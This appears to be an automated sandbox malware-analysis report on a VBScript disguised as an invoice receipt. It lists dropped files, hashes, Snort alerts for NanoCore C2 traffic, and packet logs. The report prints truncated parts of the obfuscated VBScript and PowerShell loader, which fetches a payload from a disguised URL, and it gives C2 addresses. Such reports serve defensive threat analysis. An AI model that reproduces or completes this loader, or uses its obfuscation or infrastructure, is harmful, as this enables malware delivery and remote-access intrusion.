Preview:	PSMODULECACHE.X..........I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1L.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-SmbBandwidthLimit........Get-SmbClientConfiguration........Get-SmbSession........Get-Sm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1204
Entropy (8bit):	5.327588920450071
Encrypted:	false
SSDEEP:	24:3ULPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJP+qn:oPerB4nqRL/HvFe9t4Cv94aP+qn
MD5:	B2E8F5B1D2CA14F416C34A1D80229547
SHA1:	25427AFC9715DC9C34187C211788E2409C83FA48
SHA-256:	A0B23D2B06F072A75AE6E5182F3776207E9EB012C568F11A10E5EE55F1F7FD03
SHA-512:	D3E88A11415A981DD475ABB03BD2B1DAAA264FED387D1D6157317986CEC9FB813285EBCE2DEE4079A01EB929498B1D587482E8C05EF467D0796662369AC68AC0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0bdskvdo.hrv.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_svz2t0bn.kt3.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	data
Category:	dropped
Size (bytes):	2088
Entropy (8bit):	7.089541637477408
Encrypted:	false
SSDEEP:	48:IknjhUknjhUknjhUknjhUknjhUknjhUknjhUknjhUknjhL:HjhDjhDjhDjhDjhDjhDjhDjhDjhL
MD5:	84864902DEC5038CEF326FF21E8D5F98
SHA1:	2F10FEC81D95813C3B2530EC4CECED70164A08C5
SHA-256:	5B4853A46F99AC6445B68DC1A841D511D0E86C6EDEC2A0A84F3778039A578B6B
SHA-512:	A77BCDB522CE208C8D785F44D9FE90C6D1314CB199A4BE72E220F4B8C5446265EEEF1C51EFFD2D7BDCCDC8F4A76F803A41A4973364757950D0777E8BAEF0B14C
Malicious:	false
Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+..........~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+..........~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+..........~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+..........~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:11tH8:q
MD5:	4D9EC01140C90DEB228311EF4E755D02
SHA1:	8A14987DC0B0A8C0F09AE82A107D742206B0180E
SHA-256:	E2E03B5CF1E00F53364664053F218C678A4DE4E8F90D6E298B67D0504A62B52F
SHA-512:	F4C8DE4DEDB383254091316EDA6E4453212ADCCB8A841E7FCCED2177D0CE248E45D704D3BCE4E6452C9BBA4913A8D05F6F008129ED7877538AE8A21A9BEBA3EA
Malicious:	true
Preview:	.....x.H

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	5.153055907333276
Encrypted:	false
SSDEEP:	3:9bzY6oRDT6P2bfVn1:RzWDT621
MD5:	4E5E92E2369688041CC82EF9650EDED2
SHA1:	15E44F2F3194EE232B44E9684163B6F66472C862
SHA-256:	F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
SHA-512:	1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
Malicious:	false
Preview:	9iH...}Z.4..f.~a........~.~.......3.U.

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	data
Category:	dropped
Size (bytes):	327768
Entropy (8bit):	7.999367066417797
Encrypted:	true
SSDEEP:	6144:oX44S90aTiB66x3PlZmqze1d1wI8lkWmtjJ/3Exi:LkjbU7LjGxi
MD5:	2E52F446105FBF828E63CF808B721F9C
SHA1:	5330E54F238F46DC04C1AC62B051DB4FCD7416FB
SHA-256:	2F7479AA2661BD259747BC89106031C11B3A3F79F12190E7F19F5DF65B7C15C8
SHA-512:	C08BA0E3315E2314ECBEF38722DF834C2CB8412446A9A310F41A8F83B4AC5984FCC1B26A1D8B0D58A730FDBDD885714854BDFD04DCDF7F582FC125F552D5C3CA
Malicious:	false
Preview:	pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...\|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.).....{B.[...y%...i.Q.<..xt.X..H.. ..HF7g...I.3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.\|i4...i...;O...n.?.,. ....v?.5}.OY@.dG\|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...\|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`\|.B....3.....I..o...u1..8i=.z.W..7

C:\Users\user\Documents\20210914\PowerShell_transcript.960781.2lAwMU9N.20210914212336.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	12047
Entropy (8bit):	4.433442702333654
Encrypted:	false
SSDEEP:	192:ZW4yyyyyyyyyyyyyyRyyyyyyyyyyyyyyjXWi8yyyyyyyyyyyAnmyyyyyyyyyyyif:ZjX+amXgX+amXFjX+amX3vyGLGLwF
MD5:	9EC54AB7976935E2A9B77448A253ACED
SHA1:	FF560AFC92EE8C25F1397E079326FCB77C6B0387
SHA-256:	527EDDB515A6D3F8017E6ED82FAFF848D6879960C89398B889A603FE35F15209
SHA-512:	3C592D33E5A38C448862FF7B47195B85A686F98BEDBCC58B3F16EE35A4ECD46E59B696CCBD50E7F4DAB96A8238E50BBE74C95C53ADD715F7972420FD1A156680
Malicious:	false
Preview:	.*********************..Windows PowerShell transcript start..Start time: 20210914212336..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 960781 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/DJr8t4/edrfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X

Static File Info

General
File type:	ASCII text, with very long lines, with CRLF line terminators
Entropy (8bit):	3.6551319643972597
TrID:
File name:	9 ITEMS INVOICE RECEIPT.vbs
File size:	3095
MD5:	0384a449d571139a484a9d12a0ebebab
SHA1:	24b1d1b1015c6a094ba24cd08644d9e84a51fd9b
SHA256:	d25e7688f13dac827642a6487d821be79dd13e73e0e16f458c384a45fc3e8d5b
SHA512:	4b77066c2a0793d342003b4e7d97c3baccd5bb6e0784da46cffdaabf52d997e1bcc90d4f2264d0b9f828ac87af1eabaf31265263057c167c155ffdffae9a57e4
SSDEEP:	96:84yyyyyyyyyyyyyyRyyyyyyyyyyyyyyjXWipjOyyyyyyyyyyy0lnmyyyyyyyyyyK:84yyyyyyyyyyyyyyRyyyyyyyyyyyyyyM
File Content Preview:	Set H = CreateObject("WScript.She"&"ll")..H1 = "POwerSheLL "..H2 = "$SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/DJr8t4/edrfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/14/21-21:25:03.718917	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	52704	8.8.8.8	192.168.2.5
09/14/21-21:25:04.240633	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49694	6700	192.168.2.5	194.147.140.20
09/14/21-21:25:10.184360	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	52212	8.8.8.8	192.168.2.5
09/14/21-21:25:10.377545	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49695	6700	192.168.2.5	194.147.140.20
09/14/21-21:25:17.243912	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	54302	8.8.8.8	192.168.2.5
09/14/21-21:25:17.454498	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49696	6700	192.168.2.5	194.147.140.20
09/14/21-21:25:24.490871	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	53784	8.8.8.8	192.168.2.5
09/14/21-21:25:24.679676	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49697	6700	192.168.2.5	194.147.140.20
09/14/21-21:25:31.322356	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	65307	8.8.8.8	192.168.2.5
09/14/21-21:25:31.518149	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49698	6700	192.168.2.5	194.147.140.20
09/14/21-21:25:37.763046	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49699	6700	192.168.2.5	194.147.140.20
09/14/21-21:25:44.658960	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	62060	8.8.8.8	192.168.2.5
09/14/21-21:25:44.926900	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49700	6700	192.168.2.5	194.147.140.20
09/14/21-21:25:51.820325	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49701	6700	192.168.2.5	194.147.140.20
09/14/21-21:25:58.777549	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49702	6700	192.168.2.5	194.147.140.20
09/14/21-21:26:04.902676	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	49557	8.8.8.8	192.168.2.5
09/14/21-21:26:05.105994	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49703	6700	192.168.2.5	194.147.140.20
09/14/21-21:26:09.645779	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49704	6700	192.168.2.5	194.147.140.20
09/14/21-21:26:16.232586	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49705	6700	192.168.2.5	194.147.140.20
09/14/21-21:26:20.728470	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	52441	8.8.8.8	192.168.2.5
09/14/21-21:26:20.993282	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49706	6700	192.168.2.5	194.147.140.20
09/14/21-21:26:25.632462	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49707	6700	192.168.2.5	194.147.140.20
09/14/21-21:26:32.231604	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49708	6700	192.168.2.5	194.147.140.20
09/14/21-21:26:39.306857	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49709	6700	192.168.2.5	194.147.140.20
09/14/21-21:26:46.280250	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49710	6700	192.168.2.5	194.147.140.20
09/14/21-21:26:53.149000	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	60151	8.8.8.8	192.168.2.5
09/14/21-21:26:53.339263	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49711	6700	192.168.2.5	194.147.140.20
09/14/21-21:26:57.792027	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49712	6700	192.168.2.5	194.147.140.20
09/14/21-21:27:04.248996	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49713	6700	192.168.2.5	194.147.140.20
09/14/21-21:27:11.284697	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49714	6700	192.168.2.5	194.147.140.20
09/14/21-21:27:15.749195	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49715	6700	192.168.2.5	194.147.140.20
09/14/21-21:27:22.581970	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	60075	8.8.8.8	192.168.2.5
09/14/21-21:27:22.774803	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49716	6700	192.168.2.5	194.147.140.20
09/14/21-21:27:27.251849	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49717	6700	192.168.2.5	194.147.140.20
09/14/21-21:27:33.497619	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	64345	8.8.8.8	192.168.2.5
09/14/21-21:27:33.698706	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49718	6700	192.168.2.5	194.147.140.20
09/14/21-21:27:38.024162	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	57128	8.8.8.8	192.168.2.5
09/14/21-21:27:38.216230	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49719	6700	192.168.2.5	194.147.140.20

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 14, 2021 21:23:48.869379044 CEST	49689	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:23:48.869429111 CEST	443	49689	144.76.136.153	192.168.2.5
Sep 14, 2021 21:23:48.869609118 CEST	49689	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:23:48.970433950 CEST	49689	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:23:48.970464945 CEST	443	49689	144.76.136.153	192.168.2.5
Sep 14, 2021 21:23:49.039700985 CEST	443	49689	144.76.136.153	192.168.2.5
Sep 14, 2021 21:23:49.039830923 CEST	49689	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:23:49.064105988 CEST	49689	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:23:49.064147949 CEST	443	49689	144.76.136.153	192.168.2.5
Sep 14, 2021 21:23:49.064707041 CEST	443	49689	144.76.136.153	192.168.2.5
Sep 14, 2021 21:23:49.115113974 CEST	49689	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:23:49.137454033 CEST	49689	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:23:49.179157972 CEST	443	49689	144.76.136.153	192.168.2.5
Sep 14, 2021 21:23:49.763601065 CEST	443	49689	144.76.136.153	192.168.2.5
Sep 14, 2021 21:23:49.763703108 CEST	443	49689	144.76.136.153	192.168.2.5
Sep 14, 2021 21:23:49.763777018 CEST	49689	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:23:49.763797045 CEST	443	49689	144.76.136.153	192.168.2.5
Sep 14, 2021 21:23:49.763816118 CEST	443	49689	144.76.136.153	192.168.2.5
Sep 14, 2021 21:23:49.763871908 CEST	49689	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:23:49.763881922 CEST	443	49689	144.76.136.153	192.168.2.5
Sep 14, 2021 21:23:49.763900995 CEST	49689	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:23:49.764442921 CEST	443	49689	144.76.136.153	192.168.2.5
Sep 14, 2021 21:23:49.764563084 CEST	49689	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:23:49.764575958 CEST	443	49689	144.76.136.153	192.168.2.5
Sep 14, 2021 21:23:49.764646053 CEST	49689	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:23:49.805550098 CEST	49689	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:31.396028042 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:31.396061897 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:31.396262884 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:31.396624088 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:31.396635056 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:31.449090004 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:31.493710995 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:31.500319004 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:31.500341892 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.269000053 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.269129038 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.269315004 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.269337893 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.269409895 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.269421101 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.269443035 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.269540071 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.292665005 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.292692900 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.292771101 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.292865992 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.292917013 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.292927980 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.293114901 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.293133020 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.293225050 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.293236017 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.293292999 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.293329000 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.293426991 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.293437004 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.293536901 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.293644905 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.293654919 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.316792965 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.317106009 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.317109108 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.317176104 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.317235947 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.317296028 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.317406893 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.317461967 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.317516088 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.317614079 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.317626953 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.317656040 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.317697048 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.317769051 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.317822933 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.317923069 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.317965031 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.318068981 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.341227055 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.341373920 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.341407061 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.341427088 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.341443062 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.341479063 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.344209909 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.344420910 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.345367908 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.345470905 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.345628977 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.345705986 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.345866919 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.345932961 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.346060038 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.346137047 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.346249104 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.346323013 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.346424103 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.346514940 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.346827030 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.346911907 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.347203970 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.347333908 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.347399950 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.347487926 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.347567081 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.347708941 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.371673107 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.371833086 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.371876955 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.371887922 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.371958971 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.372009993 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.372167110 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.373945951 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.374078989 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.374104977 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.374191046 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.374443054 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.374536991 CEST	49693	443	192.168.2.5	144.76.136.153
Sep 14, 2021 21:24:32.374631882 CEST	443	49693	144.76.136.153	192.168.2.5
Sep 14, 2021 21:24:32.374720097 CEST	49693	443	192.168.2.5	144.76.136.153
